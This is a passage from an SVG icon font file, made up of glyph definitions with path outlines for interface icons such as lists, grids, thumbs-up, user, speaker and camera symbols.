d="M0 550q0 52 36.5 88.5t88.5 36.5h83q52 0 88.5 -36.5t36.5 -88.5v-83q0 -52 -36.5 -88.5t-88.5 -36.5h-83q-52 0 -88.5 36.5t-36.5 88.5v83zM417 550q0 52 36.5 88.5t88.5 36.5h83q52 0 88.5 -36.5t36.5 -88.5v-83q0 -52 -36.5 -88.5t-88.5 -36.5h-83q-52 0 -88.5 36.5
t-36.5 88.5v83zM0 133q0 52 36.5 88.5t88.5 36.5h83q52 0 88.5 -36.5t36.5 -88.5v-83q0 -52 -36.5 -88.5t-88.5 -36.5h-83q-52 0 -88.5 36.5t-36.5 88.5v83zM417 133q0 52 36.5 88.5t88.5 36.5h83q52 0 88.5 -36.5t36.5 -88.5v-83q0 -52 -36.5 -88.5t-88.5 -36.5h-83
q-52 0 -88.5 36.5t-36.5 88.5v83z" />
    <glyph glyph-name="glyph275" unicode="&#xe113;" horiz-adv-x="833" 
d="M708 50h-291q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12h291q17 0 29.5 12t12.5 29t-12.5 29.5t-29.5 12.5zM708 133q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5h-291q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5h291zM708 342h-291
q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29.5t29.5 -12.5h291q17 0 29.5 12.5t12.5 29.5t-12.5 29.5t-29.5 12.5zM708 425q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5h-291q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5h291zM708 633h-291q-17 0 -29.5 -12
t-12.5 -29t12.5 -29.5t29.5 -12.5h291q17 0 29.5 12.5t12.5 29.5t-12.5 29t-29.5 12zM708 717q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5h-291q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5h291zM167 133q35 0 59 -24.5t24 -58.5v-83q0 -35 -24.5 -59.5
t-58.5 -24.5h-84q-34 0 -58.5 24.5t-24.5 59.5v83q0 34 24 58.5t59 24.5h84zM167 -33v83h-84v-83h84zM167 425q35 0 59 -24.5t24 -58.5v-84q0 -34 -24 -58.5t-59 -24.5h-84q-35 0 -59 24.5t-24 58.5v84q0 34 24 58.5t59 24.5h84zM167 258v84h-84v-84h84zM167 717
q34 0 58.5 -24.5t24.5 -59.5v-83q0 -34 -24 -58.5t-59 -24.5h-84q-35 0 -59 24.5t-24 58.5v83q0 35 24.5 59.5t58.5 24.5h84zM167 550v83h-84v-83h84z" />
    <glyph glyph-name="glyph276" unicode="&#xe114;" horiz-adv-x="771" 
d="M688 92q34 0 58.5 -24.5t24.5 -59.5q0 -34 -24.5 -58.5t-58.5 -24.5h-292q-35 0 -59.5 24.5t-24.5 58.5t25 59t59 25h292zM688 383q34 0 58.5 -24.5t24.5 -58.5t-24.5 -58.5t-58.5 -24.5h-292q-35 0 -59.5 24.5t-24.5 58.5t24.5 58.5t59.5 24.5h292zM688 675
q34 0 58.5 -24.5t24.5 -58.5q0 -35 -24.5 -59.5t-58.5 -24.5h-292q-34 0 -59 25t-25 59t24.5 58.5t59.5 24.5h292zM0 8q0 104 104 104t104 -104t-104 -104t-104 104zM0 300q0 104 104 104t104 -104t-104 -104t-104 104zM0 592q0 104 104 104t104 -104t-104 -104t-104 104z
" />
    <glyph glyph-name="glyph277" unicode="&#xe115;" horiz-adv-x="833" 
d="M708 50h-583q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12h583q17 0 29.5 12t12.5 29t-12.5 29.5t-29.5 12.5zM708 133q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5h-583q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5h583zM708 342h-583
q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29.5t29.5 -12.5h583q17 0 29.5 12.5t12.5 29.5t-12.5 29.5t-29.5 12.5zM708 425q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5h-583q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5h583zM708 633h-583q-17 0 -29.5 -12
t-12.5 -29t12.5 -29.5t29.5 -12.5h583q17 0 29.5 12.5t12.5 29.5t-12.5 29t-29.5 12zM708 717q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5h-583q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5h583z" />
    <glyph glyph-name="glyph278" unicode="&#xe116;" 
d="M667 92q34 0 58.5 -24.5t24.5 -59.5q0 -34 -24 -58.5t-59 -24.5h-584q-35 0 -59 24.5t-24 58.5q0 35 24.5 59.5t58.5 24.5h584zM667 383q35 0 59 -24.5t24 -58.5t-24 -58.5t-59 -24.5h-584q-35 0 -59 24.5t-24 58.5t24 58.5t59 24.5h584zM667 675q35 0 59 -24.5t24 -58.5
q0 -35 -24.5 -59.5t-58.5 -24.5h-584q-34 0 -58.5 24.5t-24.5 59.5q0 34 24 58.5t59 24.5h584z" />
    <glyph glyph-name="glyph279" unicode="&#xe117;" horiz-adv-x="833" 
d="M167 133q35 0 59 -24.5t24 -58.5v-83q0 -35 -24.5 -59.5t-58.5 -24.5h-84q-34 0 -58.5 24.5t-24.5 59.5v83q0 34 24 58.5t59 24.5h84zM167 -33v83h-84v-83h84zM167 425q35 0 59 -24.5t24 -58.5v-84q0 -34 -24 -58.5t-59 -24.5h-84q-35 0 -59 24.5t-24 58.5v84
q0 34 24 58.5t59 24.5h84zM167 258v84h-84v-84h84zM167 717q34 0 58.5 -24.5t24.5 -59.5v-83q0 -34 -24 -58.5t-59 -24.5h-84q-35 0 -59 24.5t-24 58.5v83q0 35 24.5 59.5t58.5 24.5h84zM167 550v83h-84v-83h84zM458 133q35 0 59.5 -24.5t24.5 -58.5v-83q0 -35 -25 -59.5
t-59 -24.5h-83q-34 0 -58.5 24.5t-24.5 59.5v83q0 34 24 58.5t59 24.5h83zM458 -33v83h-83v-83h83zM458 425q35 0 59.5 -24.5t24.5 -58.5v-84q0 -34 -24.5 -58.5t-59.5 -24.5h-83q-35 0 -59 24.5t-24 58.5v84q0 34 24 58.5t59 24.5h83zM458 258v84h-83v-84h83zM458 717
q34 0 59 -24.5t25 -59.5v-83q0 -34 -24.5 -58.5t-59.5 -24.5h-83q-35 0 -59 24.5t-24 58.5v83q0 35 24.5 59.5t58.5 24.5h83zM458 550v83h-83v-83h83zM750 133q34 0 58.5 -24.5t24.5 -58.5v-83q0 -35 -24.5 -59.5t-58.5 -24.5h-83q-35 0 -59.5 24.5t-24.5 59.5v83
q0 34 24.5 58.5t59.5 24.5h83zM750 -33v83h-83v-83h83zM750 425q34 0 58.5 -24.5t24.5 -58.5v-84q0 -34 -24.5 -58.5t-58.5 -24.5h-83q-35 0 -59.5 24.5t-24.5 58.5v84q0 34 24.5 58.5t59.5 24.5h83zM750 258v84h-83v-84h83zM750 717q34 0 58.5 -24.5t24.5 -59.5v-83
q0 -34 -24.5 -58.5t-58.5 -24.5h-83q-35 0 -59.5 24.5t-24.5 58.5v83q0 35 24.5 59.5t59.5 24.5h83zM750 550v83h-83v-83h83z" />
    <glyph glyph-name="glyph280" unicode="&#xe118;" horiz-adv-x="792" 
d="M0 8q0 104 104 104t104 -104t-104 -104t-104 104zM0 300q0 104 104 104t104 -104t-104 -104t-104 104zM0 592q0 104 104 104t104 -104t-104 -104t-104 104zM292 8q0 104 104 104t104 -104t-104 -104t-104 104zM292 300q0 104 104 104t104 -104t-104 -104t-104 104z
M292 592q0 104 104 104t104 -104t-104 -104t-104 104zM583 8q0 104 105 104q104 0 104 -104t-104 -104q-105 0 -105 104zM583 300q0 104 105 104q104 0 104 -104t-104 -104q-105 0 -105 104zM583 592q0 104 105 104q104 0 104 -104t-104 -104q-105 0 -105 104z" />
    <glyph glyph-name="glyph281" unicode="&#xe119;" horiz-adv-x="417" 
d="M229 172q27 -7 45 -29t18 -51q0 -34 -25 -59t-59 -25t-58.5 24.5t-24.5 59.5q0 29 18 51t45 29v232q0 8 6 14.5t14 6.5t14.5 -6.5t6.5 -14.5v-232zM354 239q63 -63 63 -147q0 -86 -61.5 -147.5t-147.5 -61.5t-147 61.5t-61 147.5q0 85 62 147v332q0 60 43 103t103 43
t103 -43t43 -103v-332zM208 -33q52 0 88.5 36.5t36.5 88.5q0 70 -62 107v372q0 25 -18.5 43.5t-44.5 18.5t-44 -18.5t-18 -43.5v-372q-63 -37 -63 -107q0 -52 36.5 -88.5t88.5 -36.5z" />
    <glyph glyph-name="glyph282" unicode="&#xe11a;" horiz-adv-x="708" 
d="M583 592q52 0 88.5 -36.5t36.5 -88.5v-250q0 -52 -36.5 -88.5t-88.5 -36.5q-61 0 -99 50q-34 -34 -50.5 -67.5t-16.5 -87.5q0 -43 -30.5 -73.5t-73.5 -30.5t-74 30.5t-31 73.5q0 76 13 151q-139 15 -161 23q-30 11 -47 41.5t-12 62.5l28 249q5 30 25.5 55.5t46.5 35.5
l13 5q56 23 136 23q66 0 139.5 -20.5t104.5 -44.5l7 -8q37 32 82 32zM333 -12q0 43 8.5 78t26 62.5t29 41t32.5 34.5q29 29 29 55v208q0 9 -5 20t-10 15q-19 14 -79 31t-114 17q-61 0 -104 -17l-16 -6q-5 -2 -11.5 -10t-7.5 -15l-27 -249q-2 -10 4 -13q12 -3 86 -12t95 -11
l55 8l-12 -59q-20 -98 -20 -178q0 -8 6 -14.5t14 -6.5t14.5 6.5t6.5 14.5zM625 217v250q0 17 -12.5 29t-29.5 12t-29 -12t-12 -29v-250q0 -17 12 -29.5t29 -12.5t29.5 12.5t12.5 29.5z" />
    <glyph glyph-name="glyph283" unicode="&#xe11b;" horiz-adv-x="731" 
d="M712 312q45 -68 -25 -154q-44 -58 -154 -87q-16 -4 -34.5 -13.5t-29.5 -17t-27 -19.5t-17 -13q4 -9 8.5 -23.5t0.5 -51t-30 -62.5q-25 -27 -59 -36t-62.5 -1.5t-45.5 24.5l-208 209q-58 67 -4 133q122 142 154 196q8 13 13 40.5t10.5 68.5t9.5 62q5 28 26 48.5t40 27.5
l18 7l54 50q19 5 37.5 6t28.5 0l9 -2q35 63 96 63q55 0 92.5 -50t7.5 -109l-34 -75l71 -37q55 -55 67 -104q8 -37 -13 -80zM283 -71q21 -20 46 -8t25 37q0 17 -13 30l-204 204l-29 -30q-12 -12 -12 -29t12 -29zM616 342q16 0 26 11t4 26q-21 36 -46 54q-43 29 -88 25
q-28 0 -71 -29q-10 -5 -10 1q1 2 2 3q100 163 117 200q6 16 -3.5 31t-25.5 15q-21 0 -38 -25q-5 -9 -38.5 -69t-48.5 -89l20 100q3 15 -6 24t-23 9q-6 0 -14 -6t-11 -15l-16 -54q-3 6 -12 11.5t-18 5.5q-20 0 -25 -21l-29 -162q-6 -37 -75 -121l192 -192q24 24 75 54
q29 18 74.5 25.5t71.5 24.5q50 34 50 71q0 33 -29 33q-8 0 -14 -4t-16.5 -13.5t-19.5 -15.5q-25 -12 -55 -12q-31 0 -50.5 23.5t-19.5 55.5q0 54 41 71q22 9 46.5 6.5t37.5 -15.5q5 -5 13.5 -16t15.5 -16t16 -5zM608 312q-28 0 -37 13q-19 29 -46 29q-21 0 -33.5 -11.5
t-12.5 -30.5t12.5 -32t33.5 -13q27 0 46 29q11 16 37 16z" />
    <glyph glyph-name="glyph284" unicode="&#xe11c;" horiz-adv-x="708" 
d="M649 438q30 -11 46.5 -41t11.5 -62l-28 -249q-5 -31 -25.5 -56t-46.5 -35l-13 -5q-56 -23 -136 -23q-66 0 -139 20.5t-104 44.5l-8 8q-37 -32 -82 -32q-52 0 -88.5 36.5t-36.5 88.5v250q0 52 36.5 88.5t88.5 36.5q61 0 99 -50q35 35 51.5 67.5t16.5 86.5q0 43 30.5 74
t73.5 31t73.5 -31t30.5 -74q0 -75 -13 -150q136 -14 162 -24zM125 92q17 0 29.5 12t12.5 29v250q0 17 -12.5 29.5t-29.5 12.5t-29.5 -12.5t-12.5 -29.5v-250q0 -17 12.5 -29t29.5 -12zM597 98l28 249q2 10 -5 13q-12 3 -86 12t-95 11l-55 -8l13 59q20 93 20 178
q0 8 -6.5 14.5t-14.5 6.5t-14.5 -6.5t-6.5 -14.5q0 -43 -8.5 -78t-26 -62.5t-29 -41t-32.5 -34.5q-29 -29 -29 -55v-208q0 -24 15 -35q19 -14 79 -31t114 -17q62 0 105 17l15 6q5 2 11.5 10t7.5 15z" />
    <glyph glyph-name="glyph285" unicode="&#xe11d;" horiz-adv-x="625" 
d="M292 -33q-53 0 -89 36l-166 167q-37 37 -37 88q0 52 37 89q35 35 88 35t88 -35l50 -50l128 230q16 30 45.5 47.5t63.5 17.5q70 0 107.5 -60.5t1.5 -125.5l-208 -375q-35 -64 -109 -64zM125 300q-17 0 -29.5 -12.5t-12.5 -29.5q0 -16 13 -29l166 -167q15 -15 35.5 -12
t30.5 21l208 375q9 18 3.5 34t-19.5 23q-15 8 -31.5 3t-24.5 -19l-182 -327l-128 128q-12 12 -29 12z" />
    <glyph glyph-name="glyph286" unicode="&#xe11e;" horiz-adv-x="542" 
d="M499 540q30 -16 39.5 -50t-7.5 -64l-208 -375q-20 -36 -61 -42l-12 -1q-34 0 -59 25l-167 166q-25 25 -25 59t25 59t59 25t59 -25l89 -88l154 278q16 30 50 40t64 -7z" />
    <glyph glyph-name="glyph287" unicode="&#xe11f;" horiz-adv-x="855" 
d="M819 464q36 -36 35.5 -88.5t-36.5 -88.5l-381 -375q-38 -36 -88 -36q-52 0 -89 37l-224 223q-36 36 -35.5 88.5t36.5 88.5l381 375q35 35 88.5 34.5t88.5 -35.5zM760 347q12 12 12 29t-12 29l-53 53q-25 -23 -58 -22.5t-57 24.5t-24.5 57t22.5 58l-54 53q-12 12 -30 12
q-17 0 -29 -12l-381 -375q-12 -12 -12.5 -29t11.5 -29l53 -53q25 23 58 22.5t57 -24.5q23 -24 24 -57t-21 -58l53 -53q12 -12 30 -12.5t30 11.5zM407 90l-194 194l235 226l194 -194zM272 283l136 -135l175 169l-135 135z" />
    <glyph glyph-name="glyph288" unicode="&#xe120;" 
d="M542 258q0 -17 -12.5 -29t-29.5 -12h-125q-17 0 -29.5 12t-12.5 29t12.5 29.5t29.5 12.5h125q17 0 29.5 -12.5t12.5 -29.5zM375 550q-121 0 -206.5 -85.5t-85.5 -206.5t85.5 -206t206.5 -85t206.5 85t85.5 206t-85.5 206.5t-206.5 85.5zM375 633q155 0 265 -110t110 -265
t-110 -265t-265 -110t-265 110t-110 265t110 265t265 110zM417 383q0 17 -12.5 29.5t-29.5 12.5t-29.5 -12.5t-12.5 -29.5v-125q0 -17 12.5 -29t29.5 -12t29.5 12t12.5 29v125zM375 467q-86 0 -147 -61.5t-61 -147.5t61 -147t147 -61t147 61t61 147t-61 147.5t-147 61.5z
M375 508q103 0 176.5 -73t73.5 -177t-73.5 -177t-176.5 -73t-176.5 73t-73.5 177t73.5 177t176.5 73z" />
    <glyph glyph-name="glyph289" unicode="&#xe121;" horiz-adv-x="583" 
d="M583 133q0 -51 -37 -88t-88 -37t-88 37l-78 78l-79 -78q-35 -35 -88 -35t-88 35q-37 37 -37 88q0 52 37 89l78 78l-78 78q-37 37 -37 89q0 51 37 88q35 35 88 35t88 -35l79 -78l78 78q35 35 88.5 35t88.5 -35q36 -36 36 -88q0 -53 -36 -89l-79 -78l79 -78q36 -36 36 -89z
M292 241l137 -137q12 -12 29.5 -12t29.5 12t12 29q0 18 -12 30l-137 137l137 137q12 12 12 30q0 17 -12 29t-29.5 12t-29.5 -12l-137 -137l-138 137q-12 12 -29 12t-29 -12q-13 -13 -13 -29q0 -17 13 -30l137 -137l-137 -137q-13 -13 -13 -30q0 -16 13 -29q12 -12 29 -12
t29 12z" />
    <glyph glyph-name="glyph290" unicode="&#xe122;" horiz-adv-x="500" 
d="M476 526q25 -25 25 -59t-25 -59l-108 -108l108 -108q25 -25 25 -59t-25 -59q-24 -24 -59 -24t-59 24l-108 108l-108 -108q-24 -24 -59 -24t-59 24q-25 25 -25 59t25 59l108 108l-108 108q-25 25 -25 59t25 59q24 25 59 25t59 -25l108 -108l108 108q24 25 59 25t59 -25z
" />
    <glyph glyph-name="glyph291" unicode="&#xe123;" horiz-adv-x="625" 
d="M583 508q17 0 29.5 -12t12.5 -29t-12.5 -29.5t-29.5 -12.5v-333q0 -69 -48.5 -118t-117.5 -49h-209q-69 0 -117.5 49t-48.5 118v333q-17 0 -29.5 12.5t-12.5 29.5t12.5 29t29.5 12h41v42q0 34 24.5 58.5t59.5 24.5h291q35 0 59.5 -24.5t24.5 -58.5v-42h41zM167 550v-42
h291v42h-291zM500 92v333h-375v-333q0 -35 24.5 -59.5t58.5 -24.5h209q34 0 58.5 24.5t24.5 59.5zM188 362q8 0 14 -6t6 -14v-250q0 -8 -6 -14.5t-14 -6.5t-14.5 6.5t-6.5 14.5v250q0 8 6.5 14t14.5 6zM271 362q8 0 14.5 -6t6.5 -14v-250q0 -8 -6.5 -14.5t-14.5 -6.5
t-14.5 6.5t-6.5 14.5v250q0 8 6.5 14t14.5 6zM354 362q8 0 14.5 -6t6.5 -14v-250q0 -8 -6.5 -14.5t-14.5 -6.5t-14.5 6.5t-6.5 14.5v250q0 8 6.5 14t14.5 6zM438 362q8 0 14 -6t6 -14v-250q0 -8 -6 -14.5t-14 -6.5t-14.5 6.5t-6.5 14.5v250q0 8 6.5 14t14.5 6z" />
    <glyph glyph-name="glyph292" unicode="&#xe124;" 
d="M741 76q17 -22 4 -45t-37 -23h-291v-125q0 -17 -12.5 -29t-29.5 -12t-29.5 12t-12.5 29v125h-291q-24 0 -37 23t4 45l113 141h-39q-23 0 -36 21t2 44q292 417 293 418q12 16 33 16.5t34 -17.5l292 -417q14 -23 1.5 -44t-35.5 -21h-39zM417 92h205l-113 140q-17 22 -4 45
t37 23h45l-212 302l-212 -302h45q24 0 37 -23t-4 -45l-113 -140h205v208q0 17 12.5 29.5t29.5 12.5t29.5 -12.5t12.5 -29.5v-208z" />
    <glyph glyph-name="glyph293" unicode="&#xe125;" 
d="M749 92l1 -209q0 -17 -12.5 -29t-29.5 -12h-666q-17 0 -29.5 12t-12.5 29v209q0 5 2 13l83 250q6 17 24 25q-28 37 -25 83.5t36 79.5l255 255l255 -255q33 -33 36 -79.5t-25 -83.5q17 -8 23 -25l84 -250q1 -4 1 -13zM179 484q-12 -12 -12 -29.5t12 -29.5t29.5 -12
t29.5 12l95 95v-241q0 -17 12.5 -29t29.5 -12t29.5 12t12.5 29v241l95 -95q12 -12 29.5 -12t29.5 12t12 29.5t-12 29.5l-196 196zM155 300l-69 -208h578l-69 208h-95v-21q0 -52 -36.5 -88.5t-88.5 -36.5t-88.5 36.5t-36.5 88.5v21h-95zM83 -75h584v125h-584v-125z" />
    <glyph glyph-name="glyph294" unicode="&#xe126;" 
d="M749 133l1 -208q0 -17 -12.5 -29.5t-29.5 -12.5h-666q-17 0 -29.5 12.5t-12.5 29.5q0 208 1 208q0 9 1 13l84 250q10 29 39 29h167v-83h-137l-69 -209h578l-69 209h-137v83h167q29 0 39 -29l84 -250q1 -4 1 -13zM542 471q-19 0 -30 11l-95 96v-278q0 -17 -12.5 -29.5
t-29.5 -12.5t-29.5 12.5t-12.5 29.5v278l-95 -96q-11 -11 -30 -11q-18 0 -29 11q-12 12 -12 29.5t12 29.5l196 197l196 -197q12 -12 12 -29.5t-12 -29.5q-11 -11 -29 -11z" />
    <glyph glyph-name="glyph295" unicode="&#xe127;" horiz-adv-x="792" 
d="M750 217h-250q-17 0 -29.5 12t-12.5 29t12.5 29.5t29.5 12.5h250q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29t-29.5 -12zM625 92q-17 0 -29.5 12t-12.5 29v250q0 17 12.5 29.5t29.5 12.5t29.5 -12.5t12.5 -29.5v-250q0 -17 -12.5 -29t-29.5 -12zM250 550q-52 0 -88.5 -36.5
t-36.5 -88.5t36.5 -88.5t88.5 -36.5t88.5 36.5t36.5 88.5t-36.5 88.5t-88.5 36.5zM250 633q86 0 147 -61t61 -147t-61 -147t-147 -61t-147 61t-61 147t61 147t147 61zM250 92q-59 0 -101 -18t-58 -43q60 -23 159 -23t158 23q-17 24 -58.5 42.5t-99.5 18.5zM250 175
q109 0 179.5 -50.5t70.5 -116.5q0 -33 -71.5 -58t-178.5 -25q-112 0 -181 25t-69 58q0 66 69 116.5t181 50.5z" />
    <glyph glyph-name="glyph296" unicode="&#xe128;" horiz-adv-x="792" 
d="M458 425q0 -86 -61 -147t-147 -61t-147 61t-61 147t61 147t147 61t147 -61t61 -147zM250 -75q-112 0 -181 25t-69 58q0 66 69 116.5t181 50.5q109 0 179.5 -50.5t70.5 -116.5q0 -33 -71.5 -58t-178.5 -25zM750 300q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29t-29.5 -12h-83
v-84q0 -17 -12.5 -29t-29.5 -12t-29.5 12t-12.5 29v84h-83q-17 0 -29.5 12t-12.5 29t12.5 29.5t29.5 12.5h83v83q0 17 12.5 29.5t29.5 12.5t29.5 -12.5t12.5 -29.5v-83h83z" />
    <glyph glyph-name="glyph297" unicode="&#xe129;" horiz-adv-x="792" 
d="M750 217h-250q-17 0 -29.5 12t-12.5 29t12.5 29.5t29.5 12.5h250q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29t-29.5 -12zM250 550q-52 0 -88.5 -36.5t-36.5 -88.5t36.5 -88.5t88.5 -36.5t88.5 36.5t36.5 88.5t-36.5 88.5t-88.5 36.5zM250 633q86 0 147 -61t61 -147t-61 -147
t-147 -61t-147 61t-61 147t61 147t147 61zM250 92q-59 0 -101 -18t-58 -43q60 -23 159 -23t158 23q-17 24 -58.5 42.5t-99.5 18.5zM250 175q109 0 179.5 -50.5t70.5 -116.5q0 -33 -71.5 -58t-178.5 -25q-112 0 -181 25t-69 58q0 66 69 116.5t181 50.5z" />
    <glyph glyph-name="glyph298" unicode="&#xe12a;" horiz-adv-x="792" 
d="M750 217h-250q-17 0 -29.5 12t-12.5 29t12.5 29.5t29.5 12.5h250q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29t-29.5 -12zM250 633q86 0 147 -61t61 -147t-61 -147t-147 -61t-147 61t-61 147t61 147t147 61zM250 175q109 0 179.5 -50.5t70.5 -116.5q0 -33 -71.5 -58
t-178.5 -25q-112 0 -181 25t-69 58q0 66 69 116.5t181 50.5z" />
    <glyph glyph-name="glyph299" unicode="&#xe12b;" horiz-adv-x="500" 
d="M250 550q-52 0 -88.5 -36.5t-36.5 -88.5t36.5 -88.5t88.5 -36.5t88.5 36.5t36.5 88.5t-36.5 88.5t-88.5 36.5zM250 633q86 0 147 -61t61 -147t-61 -147t-147 -61t-147 61t-61 147t61 147t147 61zM250 92q-59 0 -101 -18t-58 -43q60 -23 159 -23t158 23q-17 24 -58.5 42.5
t-99.5 18.5zM250 175q109 0 179.5 -50.5t70.5 -116.5q0 -33 -71.5 -58t-178.5 -25q-112 0 -181 25t-69 58q0 66 69 116.5t181 50.5z" />
    <glyph glyph-name="glyph300" unicode="&#xe12c;" horiz-adv-x="500" 
d="M250 633q86 0 147 -61t61 -147t-61 -147t-147 -61t-147 61t-61 147t61 147t147 61zM0 8q0 66 69 116.5t181 50.5q109 0 179.5 -50.5t70.5 -116.5q0 -33 -71.5 -58t-178.5 -25q-112 0 -181 25t-69 58z" />
    <glyph glyph-name="glyph301" unicode="&#xe12d;" horiz-adv-x="667" 
d="M238 617q-20 20 -38 54l-4 4q-8 8 0 8q0 8 8 0l4 -4l38 -50h4q45 17 67 17q53 0 100 -17q0 -3 2 -1l2 1l37 54q9 9 13 5q7 -6 0 -13q-1 -1 -38 -54l-4 -4l17 -9q59 -37 79 -83q11 -24 17 -54q0 -4 -4 -4h-409q-4 0 -4 4q6 56 46 96q27 33 62 50h5zM425 583
q-13 0 -22.5 -10.5t-6.5 -22.5q0 -15 10 -24t23 -9q12 0 20.5 10t8.5 23q0 15 -10 24t-23 9zM246 583q-13 0 -23.5 -10t-10.5 -23t11 -23t27 -10q12 0 20.5 10t8.5 23q0 15 -10 24t-23 9zM42 425q16 0 28.5 -13t12.5 -29v-208q0 -16 -12.5 -29t-28.5 -13t-29 13t-13 29v208
q0 16 13 29t29 13zM625 425q16 0 29 -13t13 -29v-208q0 -16 -13 -29t-29 -13t-29 13t-13 29v208q0 16 13 29t29 13zM125 92v333h417v-333q0 -16 -13 -29t-29 -13h-42v-125q0 -16 -12.5 -29t-28.5 -13t-29 13t-13 29v125h-83v-125q0 -16 -13 -29t-29 -13t-29 13t-13 29v125
h-41q-16 0 -29 13t-13 29z" />
    <glyph glyph-name="glyph302" unicode="&#xe12e;" horiz-adv-x="661" 
d="M323 525q-4 67 38 125l116 67q5 -67 -37 -125zM548 292q0 -56 31 -100t82 -63q-7 -30 -46 -96q-29 -41 -42 -54q-46 -62 -112 -50q-17 2 -47.5 21t-44.5 21q-30 6 -54 0q-17 -4 -52.5 -24t-47.5 -22q-7 0 -18 2t-15 2q-55 27 -88 71q-20 30 -42 75q-31 60 -41 108
q-15 58 -9 134q3 36 19 72.5t36 56.5q29 36 66 50q29 12 88 12q15 -2 57 -19.5t72 -17.5q26 0 75.5 18.5t78.5 18.5q49 0 100 -29l38 -37q-38 -25 -61 -65t-23 -85z" />
    <glyph glyph-name="glyph303" unicode="&#xe12f;" 
d="M292 279v-246q0 -6 -6 -11t-15 -5l-250 29q-21 7 -21 25v208q0 9 6 15t15 6h250q9 0 15 -6t6 -15zM354 300l375 -4q9 0 15 -6t6 -15v-292q0 -6 -6 -11t-15 -5l-375 41q-21 7 -21 25v246q0 9 6 15t15 6zM292 604v-242q0 -20 -21 -20h-250q-21 0 -21 20v209q0 9 6 15t15 6
l250 29q9 3 15 -2.5t6 -14.5zM354 629l375 38q9 3 15 -2.5t6 -14.5v-292q0 -20 -21 -20h-375q-21 0 -21 20v246q0 9 6 17t15 8z" />
    <glyph glyph-name="glyph304" unicode="&#xe130;" horiz-adv-x="833" 
d="M167 342q0 41 41 41q42 0 42 -41q0 -42 -42 -42q-41 0 -41 42zM583 592q48 0 83.5 -32t40.5 -77l71 23q20 7 37.5 -6t17.5 -33v-250q0 -20 -17 -33.5t-38 -6.5l-71 24q-6 -45 -41 -77t-83 -32h-83v-43q0 -50 -37 -87t-88 -37t-85.5 34.5t-39.5 85.5v47h-125q-51 0 -88 37
t-37 88v250q0 51 37 88t88 37h458zM375 8q16 0 29 12.5t13 28.5v84h-84v-84q2 -17 13.5 -29t28.5 -12zM583 175q18 0 30 12t12 30v250q0 17 -12.5 29t-29.5 12h-458q-17 0 -29.5 -12t-12.5 -29v-250q0 -17 12.5 -29.5t29.5 -12.5h458zM750 275v134l-83 -25v-84q5 0 83 -25z
" />
    <glyph glyph-name="glyph305" unicode="&#xe131;" horiz-adv-x="875" 
d="M833 508q18 0 30 -12t12 -29v-334q0 -17 -12 -29t-30 -12q-10 0 -18 4l-107 53v-16q0 -52 -36.5 -88.5t-88.5 -36.5h-458q-52 0 -88.5 36.5t-36.5 88.5v334q0 52 36.5 88.5t88.5 36.5h458q52 0 88.5 -36.5t36.5 -88.5v-16l107 53q8 4 18 4zM208 238q26 0 44.5 18t18.5 44
t-18.5 44t-44.5 18t-44 -18t-18 -44t18 -44t44 -18z" />
    <glyph glyph-name="glyph306" unicode="&#xe132;" horiz-adv-x="660" 
d="M422 557q31 0 54.5 -23.5t23.5 -66.5v-417q0 -43 -23.5 -67t-54.5 -24q-28 0 -56 19l-111 74q-23 16 -62.5 28t-67.5 12q-52 0 -88.5 36.5t-36.5 88.5v83q0 52 36.5 88.5t88.5 36.5q29 0 68 11.5t62 27.5l111 74q28 19 56 19zM125 175q37 0 84.5 -14t82.5 -34v262
q-35 -20 -82.5 -33.5t-84.5 -13.5q-17 0 -29.5 -12.5t-12.5 -29.5v-83q0 -17 12.5 -29.5t29.5 -12.5zM417 50v417l-1 5q-14 -9 -41.5 -27.5t-41.5 -27.5v-317l79 -52l4 -3zM554 371q12 12 29.5 12t29.5 -12q47 -47 47 -113q0 -65 -47 -112q-13 -13 -30 -13q-16 0 -29 13
q-12 12 -12 29t12 29q22 22 22 54t-22 54q-12 12 -12 29.5t12 29.5z" />
    <glyph glyph-name="glyph307" unicode="&#xe133;" horiz-adv-x="625" 
d="M613 579q12 -12 12 -29t-12 -29l-113 -113v-358q0 -43 -23.5 -67t-54.5 -24q-28 0 -56 19l-111 74q-29 20 -79 32l-105 -105q-12 -12 -29 -12q-18 0 -30 12t-12 29.5t12 29.5l64 64q-34 14 -55 45.5t-21 69.5v83q0 52 36.5 88.5t88.5 36.5q29 0 68 11.5t62 27.5l111 74
q28 19 56 19q47 0 67 -42l65 64q12 12 29.5 12t29.5 -12zM416 472q-14 -9 -41.5 -27.5t-41.5 -27.5v-88l84 84v54zM83 300v-83q0 -17 12.5 -29.5t29.5 -12.5q21 0 49 -5l118 118v101q-35 -20 -82.5 -33.5t-84.5 -13.5q-17 0 -29.5 -12.5t-12.5 -29.5zM221 158q40 -12 71 -31
v102zM416 45l1 5v304l-84 -83v-171l79 -52z" />
    <glyph glyph-name="glyph308" unicode="&#xe134;" horiz-adv-x="895" 
d="M613 371q47 -47 47 -113q0 -65 -47 -112q-13 -13 -30 -13q-16 0 -29 13q-12 12 -12 29t12 29q22 22 22 54t-22 54q-12 12 -12 29.5t12 29.5t29.5 12t29.5 -12zM696 454q81 -81 81 -195q0 -116 -81 -197q-12 -12 -29 -12q-18 0 -30 12t-12 29.5t12 29.5q56 56 56 137.5
